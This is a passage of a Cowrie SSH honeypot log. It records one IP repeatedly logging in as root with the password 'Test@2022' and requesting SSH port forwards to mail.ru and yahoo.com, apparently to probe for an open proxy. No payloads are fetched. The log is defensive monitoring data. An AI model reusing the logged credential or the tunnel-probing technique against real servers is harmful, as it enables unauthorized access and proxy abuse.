pemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.394203Z","src_ip":"77.83.207.83","session":"f1a598b0da4e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.645093Z","src_ip":"77.83.207.83","session":"f1a598b0da4e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6574,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:6574","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.696226Z","session":"f1a598b0da4e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.747286Z","src_ip":"77.83.207.83","session":"f1a598b0da4e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1210,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1210","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.888947Z","session":"f1a598b0da4e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.939741Z","src_ip":"77.83.207.83","session":"f1a598b0da4e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":9321,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:9321","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.081235Z","session":"f1a598b0da4e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.131764Z","src_ip":"77.83.207.83","session":"f1a598b0da4e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.183275Z","src_ip":"77.83.207.83","session":"f1a598b0da4e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2155,"dst_ip":"1.2.3.4","dst_port":22,"session":"2193e2207e17","protocol":"ssh","message":"New connection: 77.83.207.83:2155 (1.2.3.4:22) [session: 2193e2207e17]","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.232665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.233395Z","src_ip":"77.83.207.83","session":"2193e2207e17"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.284612Z","src_ip":"77.83.207.83","session":"2193e2207e17"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.535954Z","src_ip":"77.83.207.83","session":"2193e2207e17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18519,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18519","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.587408Z","session":"2193e2207e17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.637925Z","src_ip":"77.83.207.83","session":"2193e2207e17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":21857,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:21857","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.780863Z","session":"2193e2207e17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.831324Z","src_ip":"77.83.207.83","session":"2193e2207e17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":21046,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21046","sensor":"my-vps","timestamp":"2025-08-31T03:48:16.972686Z","session":"2193e2207e17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.023987Z","src_ip":"77.83.207.83","session":"2193e2207e17"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.075547Z","src_ip":"77.83.207.83","session":"2193e2207e17"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2259,"dst_ip":"1.2.3.4","dst_port":22,"session":"f227e614354a","protocol":"ssh","message":"New connection: 77.83.207.83:2259 (1.2.3.4:22) [session: f227e614354a]","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.124231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.134203Z","src_ip":"77.83.207.83","session":"f227e614354a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.174460Z","src_ip":"77.83.207.83","session":"f227e614354a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.422819Z","src_ip":"77.83.207.83","session":"f227e614354a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":28056,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:28056","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.473471Z","session":"f227e614354a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.524145Z","src_ip":"77.83.207.83","session":"f227e614354a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29578,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29578","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.664041Z","session":"f227e614354a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.713878Z","src_ip":"77.83.207.83","session":"f227e614354a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":4343,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:4343","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.856126Z","session":"f227e614354a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.906101Z","src_ip":"77.83.207.83","session":"f227e614354a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:17.956758Z","src_ip":"77.83.207.83","session":"f227e614354a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2337,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0c8d0952c96","protocol":"ssh","message":"New connection: 77.83.207.83:2337 (1.2.3.4:22) [session: e0c8d0952c96]","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.005648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.006325Z","src_ip":"77.83.207.83","session":"e0c8d0952c96"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.056535Z","src_ip":"77.83.207.83","session":"e0c8d0952c96"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.304348Z","src_ip":"77.83.207.83","session":"e0c8d0952c96"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":414,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:414","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.355336Z","session":"e0c8d0952c96"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.405140Z","src_ip":"77.83.207.83","session":"e0c8d0952c96"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":25153,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:25153","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.548148Z","session":"e0c8d0952c96"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.597943Z","src_ip":"77.83.207.83","session":"e0c8d0952c96"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":29033,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29033","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.740130Z","session":"e0c8d0952c96"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.790561Z","src_ip":"77.83.207.83","session":"e0c8d0952c96"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.840961Z","src_ip":"77.83.207.83","session":"e0c8d0952c96"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2438,"dst_ip":"1.2.3.4","dst_port":22,"session":"26e0fd7f1d43","protocol":"ssh","message":"New connection: 77.83.207.83:2438 (1.2.3.4:22) [session: 26e0fd7f1d43]","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.891356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.892401Z","src_ip":"77.83.207.83","session":"26e0fd7f1d43"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:18.943104Z","src_ip":"77.83.207.83","session":"26e0fd7f1d43"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.196633Z","src_ip":"77.83.207.83","session":"26e0fd7f1d43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6982,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:6982","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.248387Z","session":"26e0fd7f1d43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.299966Z","src_ip":"77.83.207.83","session":"26e0fd7f1d43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20836,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:20836","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.445339Z","session":"26e0fd7f1d43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.496267Z","src_ip":"77.83.207.83","session":"26e0fd7f1d43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":30041,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:30041","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.641175Z","session":"26e0fd7f1d43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.692017Z","src_ip":"77.83.207.83","session":"26e0fd7f1d43"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.743944Z","src_ip":"77.83.207.83","session":"26e0fd7f1d43"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2529,"dst_ip":"1.2.3.4","dst_port":22,"session":"04d7302ae5b9","protocol":"ssh","message":"New connection: 77.83.207.83:2529 (1.2.3.4:22) [session: 04d7302ae5b9]","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.793171Z"}
